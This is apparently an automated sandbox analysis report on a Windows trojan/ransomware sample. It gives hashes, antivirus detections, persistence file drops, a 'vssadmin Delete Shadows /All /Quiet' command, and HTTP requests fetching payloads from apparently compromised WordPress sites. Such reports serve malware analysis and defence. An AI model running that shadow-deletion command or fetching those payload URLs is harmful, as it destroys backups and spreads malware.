Analysis Date: 2015-01-18 04:44:32
MD5: 90c4bbc6aee0d0614100bc6e7a118895
SHA1: a87d0b00de0b22ee05d8adc2976cacde23078ca5

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text md5: e12cf254e3395201807e52a0b95d0540 sha1: 041f267dc6518776aa0e9127f4e9d72ca352b783 size: 20480
Section .rdata md5: a06432b1a35b6eae793fb415cf1e18cd sha1: 42b8b8e5f198a23f60279b5d68f9bb5e83b7ed62 size: 4096
Section .data md5: 6135a006d83d264fc331600c5abf4d6d sha1: 8ac7a712007d73b9cdca8a43b513251086dfcb39 size: 4096
Section .idata md5: d84d23bdaafde87c270661d9705250ad sha1: 1deaa6d62b3ee6a643852851c9c33e8453bd11c7 size: 4096
Section .rsrc md5: 7855e3e64ecdb056c4fc785187d00364 sha1: f3720220b1bf5f0d162e60f545e47b95c1b1c306 size: 221184
Section .reloc md5: 9900d9eb0e3a14bbd2a82ac82a84713e sha1: f80cd284f96feb6ccdb98d8b3fa2aceff58364d3 size: 4096
Timestamp: 2014-10-30 10:22:19
Pdb path: @
PEhash: cfcaccf431799fe4111224b43855479920084c44
IMPhash: 9094b744fd84bfba48ef288178cd12f5
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.GenericKD.1959935
AV Alwil (avast): Rootkit-gen [Rtk]
AV Arcabit (arcavir): Trojan.GenericKD.1959935
AV Authentium: W32/Trojan.TNQB-1837
AV Avira (antivir): TR/Rogue.pdba
AV BullGuard: Trojan.GenericKD.1959935
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): TrojanDropper.Injector.r6
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Trojan.GenericKD.1959935
AV Eset (nod32): Win32/Injector.BOWI
AV Fortinet: W32/BOUR!tr
AV Frisk (f-prot): W32/Trojan3.LXZ
AV F-Secure: Trojan.GenericKD.1959935
AV Grisoft (avg): Inject2.BDDW
AV Ikarus: Trojan-Spy.Zbot
AV K7: Unwanted-Program ( 004a8e8a1 )
AV Kaspersky: Trojan-Dropper.Win32.Injector.kvda
AV MalwareBytes: Spyware.Zbot.ED
AV Mcafee: Generic.so
AV Microsoft Security Essentials: Ransom:Win32/Crowti.A
AV MicroWorld (escan): Trojan.GenericKD.1959935
AV Rising: no_virus
AV Sophos: Troj/Wonton-IX
AV Symantec: Trojan.Cryptodefense
AV Trend Micro: TSPY_ZBOT.YRG
AV VirusBlokAda (vba32): TrojanBanker.Tinba

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\a1a0cab\a1a0cab.exe
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\a1a0cab.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\a1a0cab.exe
Creates Process: vssadmin.exe Delete Shadows /All /Quiet
Creates Process: -k netsvcs

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: designbytheme.com
Winsock DNS: blog.marianisel.com
Winsock DNS: virachey.com
Winsock DNS: freekidsvideos.net
Winsock DNS: bball-keyman.net
Winsock DNS: stpaulmaybee.org
Winsock DNS: www.grekiskaforeningen.com
Winsock DNS: bethpeters.net
Winsock DNS: danielferris.com.au
Winsock DNS: clerktogovernors.co.uk

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc

Network Details:

DNS: www.grekiskaforeningen.com (Type: A) ➝ 193.12.177.238
DNS: clerktogovernors.co.uk (Type: A) ➝ 94.136.40.103
DNS: danielferris.com.au (Type: A) ➝ 117.55.227.125
DNS: stpaulmaybee.org (Type: A) ➝ 198.23.48.88
DNS: bethpeters.net (Type: A) ➝ 184.154.193.178
DNS: blog.marianisel.com (Type: A) ➝ 70.167.156.65
DNS: virachey.com (Type: A) ➝ 198.23.48.160
DNS: bball-keyman.net (Type: A) ➝ 112.78.125.236
DNS: freekidsvideos.net (Type: A)
DNS: designbytheme.com (Type: A)
HTTP GET: http://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 193.12.177.238:80
Flows TCP: 192.168.1.1:1032 ➝ 94.136.40.103:80
Flows TCP: 192.168.1.1:1033 ➝ 117.55.227.125:80
Flows TCP: 192.168.1.1:1034 ➝ 198.23.48.88:80
Flows TCP: 192.168.1.1:1035 ➝ 184.154.193.178:80
Flows TCP: 192.168.1.1:1036 ➝ 70.167.156.65:80
Flows TCP: 192.168.1.1:1037 ➝ 198.23.48.160:80
Flows TCP: 192.168.1.1:1038 ➝ 112.78.125.236:80

Raw Pcap
Strings